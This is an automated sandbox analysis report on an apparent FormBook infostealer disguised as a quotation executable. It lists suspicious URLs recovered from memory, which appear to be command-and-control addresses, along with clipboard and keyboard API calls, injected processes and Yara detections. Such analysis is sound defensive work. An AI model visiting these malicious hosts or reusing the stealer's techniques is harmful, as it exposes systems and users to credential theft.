                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 09 Jan 2025 15:59:05 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: firefox.exe, 00000008.00000003.289522257897.0000026A53F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/r/r1.crl0
                Source: firefox.exe, 00000008.00000003.289522257897.0000026A53F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: firefox.exe, 00000008.00000003.289522257897.0000026A53F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: firefox.exe, 00000008.00000003.289522257897.0000026A53F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: firefox.exe, 00000008.00000003.289522257897.0000026A53F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: firefox.exe, 00000008.00000003.289522257897.0000026A53F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: firefox.exe, 00000008.00000003.289522257897.0000026A53F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: firefox.exe, 00000008.00000003.289522257897.0000026A53F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: firefox.exe, 00000008.00000003.289522257897.0000026A53F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/r1.crt0
                Source: cmdkey.exe, 00000006.00000002.292818357888.0000000004B08000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.0000000004068000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://maximumgroup.co.za/cxj4/?80k=lRapCPMXgDk&6B-l7F=gKtC9mpNHTkTr00JCblrl8a3AfTX/duoM8EbXMKNjeYmE
                Source: cmdkey.exe, 00000006.00000002.292818357888.0000000004B08000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.0000000004068000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://maximumgroup.co.za/cxj4/?80k=lRapCPMXgDk&amp;6B-l7F=gKtC9mpNHTkTr00JCblrl8a3AfTX/duoM8EbXMKNj
                Source: firefox.exe, 00000008.00000003.289522257897.0000026A53F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: firefox.exe, 00000008.00000003.289522257897.0000026A53F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: cmdkey.exe, 00000006.00000002.292818357888.0000000004C9A000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000041FA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://push.zhanzhang.baidu.com/push.js
                Source: cmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
                Source: cmdkey.exe, 00000006.00000002.292818357888.0000000003CE6000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.0000000003246000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chiro.live/jwa9?gp=1&js=1&uuid=1736438267.0098365932&other_args=eyJ1cmkiOiAiL2p3YTkiLCAiY
                Source: SwDwSdNMaTt.exe, 00000007.00000002.293705525670.0000000000CE0000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ogbos88.cyou
                Source: SwDwSdNMaTt.exe, 00000007.00000002.293705525670.0000000000CE0000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ogbos88.cyou/kj1o/
                Source: cmdkey.exe, 00000006.00000002.292818357888.0000000004C9A000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000041FA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zbywl.com/js.js
                Source: SwDwSdNMaTt.exe, 00000007.00000002.293707698132.0000000003246000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www70.chiro.live/
                Source: firefox.exe, 00000008.00000003.289522257897.0000026A53F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: firefox.exe, 00000008.00000003.289522257897.0000026A53F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: cmdkey.exe, 00000006.00000002.292820180506.0000000007CBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: cmdkey.exe, 00000006.00000002.292820180506.0000000007CBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: cmdkey.exe, 00000006.00000002.292820180506.0000000007CBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: cmdkey.exe, 00000006.00000002.292820180506.0000000007CBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: cmdkey.exe, 00000006.00000002.292820180506.0000000007CBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: cmdkey.exe, 00000006.00000002.292818357888.000000000400A000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.000000000356A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
                Source: cmdkey.exe, 00000006.00000003.289456056159.0000000007C93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd
                Source: cmdkey.exe, 00000006.00000002.292815481224.0000000000ACB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
                Source: cmdkey.exe, 00000006.00000002.292815481224.0000000000ACB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
                Source: cmdkey.exe, 00000006.00000002.292818357888.00000000047E4000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.0000000003D44000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ogbos88vip.click
                Source: cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
                Source: cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
                Source: cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
                Source: cmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
                Source: cmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
                Source: cmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
                Source: cmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
                Source: cmdkey.exe, 00000006.00000002.292820180506.0000000007CBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
                Source: cmdkey.exe, 00000006.00000002.292820180506.0000000007CBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: cmdkey.exe, 00000006.00000002.292820180506.0000000007CBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: SwDwSdNMaTt.exe, 00000007.00000002.293707698132.000000000451E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.furrcali.xyz/k29t/?6B-l7F=mLM4NyV3Rm7LSF6x/a3vps0uRUV7zEkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGe
                Source: cmdkey.exe, 00000006.00000002.292820180506.0000000007CBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/favicon.ico
                Source: cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
                Source: cmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
                Source: cmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: cmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
                Source: cmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
                Source: cmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
                Source: cmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
                Source: cmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: cmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
                Source: cmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: cmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
                Source: cmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
                Source: cmdkey.exe, 00000006.00000002.292818357888.0000000004C9A000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000041FA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_0013EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,2_2_0013EAFF
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_0013ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_0013ED6A
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_0013EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,2_2_0013EAFF
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_0012AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,2_2_0012AA57
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_00159576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_00159576

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.293705525670.0000000000C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.289274740765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.289276636608.0000000005200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.289276489302.0000000003BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.292817073543.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.292817177626.0000000002F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.293706459836.0000000004460000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: QUOTATION#050125.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: QUOTATION#050125.exe, 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_b03b4d24-e
                Source: QUOTATION#050125.exe, 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_e5ea26eb-8
                Source: QUOTATION#050125.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_6b27d084-2
                Source: QUOTATION#050125.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavi